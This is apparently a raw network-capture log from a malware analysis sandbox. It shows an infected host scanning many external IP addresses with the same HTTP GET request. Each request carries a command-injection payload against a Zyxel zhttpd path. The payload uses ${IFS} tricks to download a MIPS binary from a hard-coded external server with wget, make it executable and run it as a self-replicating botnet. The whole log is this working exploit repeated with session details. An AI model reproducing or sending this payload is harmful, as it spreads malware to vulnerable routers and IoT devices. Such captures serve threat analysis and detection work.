                                                Jan 12, 2024 18:16:24.477144003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4694192.168.2.2344550216.40.230.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477204084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4695192.168.2.2359454103.21.42.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477246046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4696192.168.2.2346186167.198.100.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477296114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4697192.168.2.2339748148.9.33.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477322102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4698192.168.2.2354174203.35.150.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477360964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4699192.168.2.235103068.33.247.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477406979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4700192.168.2.2335044168.107.235.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477447033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4701192.168.2.2341682140.237.192.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477464914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4702192.168.2.2346610100.210.160.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477495909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4703192.168.2.233630024.146.242.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477545023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4704192.168.2.235029046.75.82.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477575064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4705192.168.2.235065627.127.90.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477613926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4706192.168.2.235709660.61.224.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477650881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4707192.168.2.233370059.212.195.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477685928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4708192.168.2.2347790211.231.85.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477725029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4709192.168.2.235876685.80.2.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477775097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4710192.168.2.236012247.200.178.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477799892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4711192.168.2.2342466202.195.195.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477854967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4712192.168.2.2340350220.154.105.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477890968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4713192.168.2.2358760217.1.53.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477919102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4714192.168.2.235027691.111.221.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477958918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4715192.168.2.2346024183.213.14.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478007078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4716192.168.2.2352306199.29.252.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478037119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4717192.168.2.234734487.92.179.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478082895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4718192.168.2.2338932131.79.74.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478128910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4719192.168.2.2344212111.218.37.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478171110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4720192.168.2.233362627.43.23.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478204966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4721192.168.2.2350334162.184.24.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478264093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4722192.168.2.233383612.178.66.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478291988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4723192.168.2.2340294145.55.202.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478312016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4724192.168.2.2333964171.100.175.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478368998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4725192.168.2.2353512165.3.96.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478399038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4726192.168.2.2349482173.145.141.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478434086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4727192.168.2.2359016160.13.133.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478486061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4728192.168.2.2341630171.167.140.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478532076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4729192.168.2.234381032.56.74.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478566885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4730192.168.2.2337334193.230.218.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478595018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4731192.168.2.235035242.154.184.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478641033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4732192.168.2.234424427.225.67.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478676081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4733192.168.2.235584418.4.189.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478712082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4734192.168.2.2341018193.1.67.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478765965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4735192.168.2.2346980161.144.91.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478813887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4736192.168.2.235219854.168.25.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478858948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4737192.168.2.234062279.218.119.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478900909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4738192.168.2.2343240146.238.160.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.478946924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4739192.168.2.2354454219.229.197.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479001045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4740192.168.2.2359634114.88.102.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479028940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4741192.168.2.233681491.197.221.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479048014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4742192.168.2.2342912149.50.213.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479101896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4743192.168.2.2348572134.185.237.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479134083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4744192.168.2.2341620187.31.173.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479160070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4745192.168.2.2355176193.237.195.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479178905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4746192.168.2.2353944143.3.222.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479232073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4747192.168.2.2347960108.191.83.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479265928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4748192.168.2.2339242125.37.80.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479293108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4749192.168.2.233327069.31.83.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479331970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4750192.168.2.233618638.138.68.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479357004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4751192.168.2.2348318141.104.98.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479393005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4752192.168.2.2354492220.75.115.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479443073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4753192.168.2.2338262121.6.19.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479523897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4754192.168.2.2346818144.59.183.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479563951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4755192.168.2.2342428100.47.123.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.479612112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4756192.168.2.2334496221.44.82.44443
                                                TimestampBytes transferredDirectionData
